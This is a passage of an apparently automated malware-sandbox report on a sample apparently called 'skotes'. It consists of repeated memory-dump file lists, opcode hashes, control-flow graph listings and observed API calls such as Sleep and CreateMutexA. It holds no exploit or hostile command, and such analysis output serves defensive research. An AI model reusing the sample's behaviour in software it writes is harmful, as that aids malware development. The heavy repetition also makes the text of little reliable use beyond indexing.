                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 5ce312f1b096eff84262ccf66c905c644e355b0d4a02de69748edba3d3ade8b7
                                                                                                                                                                                                                                                  • Instruction ID: 1e37f5d41c6858fa18f34a18de660850287dd85d26436b9d8672458a9d1c0324
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ce312f1b096eff84262ccf66c905c644e355b0d4a02de69748edba3d3ade8b7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C315931A041048BFB08AB7CDC847ADBB62EBC5334F204619E458E73D5D7BA9980A762

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 56 f3a079-f3a099 60 f3a0c7-f3a0e3 56->60 61 f3a09b-f3a0a7 56->61 64 f3a111-f3a130 60->64 65 f3a0e5-f3a0f1 60->65 62 f3a0a9-f3a0b7 61->62 63 f3a0bd-f3a0c4 call f4d663 61->63 62->63 66 f3a930-f3a994 call f66c6a Sleep CreateMutexA 62->66 63->60 70 f3a132-f3a13e 64->70 71 f3a15e-f3a916 call f480c0 64->71 68 f3a0f3-f3a101 65->68 69 f3a107-f3a10e call f4d663 65->69 86 f3a9a7-f3a9a8 66->86 87 f3a996-f3a998 66->87 68->66 68->69 69->64 76 f3a140-f3a14e 70->76 77 f3a154-f3a15b call f4d663 70->77 76->66 76->77 77->71 87->86 88 f3a99a-f3a9a5 87->88 88->86
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: f7524893ce42cdb72e930675cd0dfb67a60017e91819978731d2347a847cf868
                                                                                                                                                                                                                                                  • Instruction ID: 976e8710a072d42ac7f7d1df4a07340c6d8aebe28b4b3e51a334cfb699f7edee
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7524893ce42cdb72e930675cd0dfb67a60017e91819978731d2347a847cf868
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3315971B001009BEB18EB7DCD85B6DBB62DF82334F204619E494E77E1C77A9980AB12

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 90 f3a1ae-f3a1ce 94 f3a1d0-f3a1dc 90->94 95 f3a1fc-f3a218 90->95 98 f3a1f2-f3a1f9 call f4d663 94->98 99 f3a1de-f3a1ec 94->99 96 f3a246-f3a265 95->96 97 f3a21a-f3a226 95->97 103 f3a293-f3a916 call f480c0 96->103 104 f3a267-f3a273 96->104 101 f3a228-f3a236 97->101 102 f3a23c-f3a243 call f4d663 97->102 98->95 99->98 105 f3a935 99->105 101->102 101->105 102->96 110 f3a275-f3a283 104->110 111 f3a289-f3a290 call f4d663 104->111 107 f3a953-f3a994 Sleep CreateMutexA 105->107 108 f3a935 call f66c6a 105->108 120 f3a9a7-f3a9a8 107->120 121 f3a996-f3a998 107->121 108->107 110->105 110->111 111->103 121->120 122 f3a99a-f3a9a5 121->122 122->120
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 26bc07904c635b3dc55d307a4d376847d031ed23ca055892a0c349fb7b7361ed
                                                                                                                                                                                                                                                  • Instruction ID: 6418e7d9e5f6424bc79cf5c963e08245a0d4e3c53036e026d2e1bece4a8438d1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26bc07904c635b3dc55d307a4d376847d031ed23ca055892a0c349fb7b7361ed
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6314831A011009BFB08AB7DDD89B6EBB62AB86330F204619E454E73D1D77A9980A712

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 124 f3a418-f3a438 128 f3a466-f3a482 124->128 129 f3a43a-f3a446 124->129 132 f3a4b0-f3a4cf 128->132 133 f3a484-f3a490 128->133 130 f3a448-f3a456 129->130 131 f3a45c-f3a463 call f4d663 129->131 130->131 136 f3a93f-f3a949 call f66c6a * 2 130->136 131->128 134 f3a4d1-f3a4dd 132->134 135 f3a4fd-f3a916 call f480c0 132->135 138 f3a492-f3a4a0 133->138 139 f3a4a6-f3a4ad call f4d663 133->139 141 f3a4f3-f3a4fa call f4d663 134->141 142 f3a4df-f3a4ed 134->142 155 f3a94e 136->155 156 f3a949 call f66c6a 136->156 138->136 138->139 139->132 141->135 142->136 142->141 157 f3a953-f3a994 Sleep CreateMutexA 155->157 158 f3a94e call f66c6a 155->158 156->155 160 f3a9a7-f3a9a8 157->160 161 f3a996-f3a998 157->161 158->157 161->160 162 f3a99a-f3a9a5 161->162 162->160
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
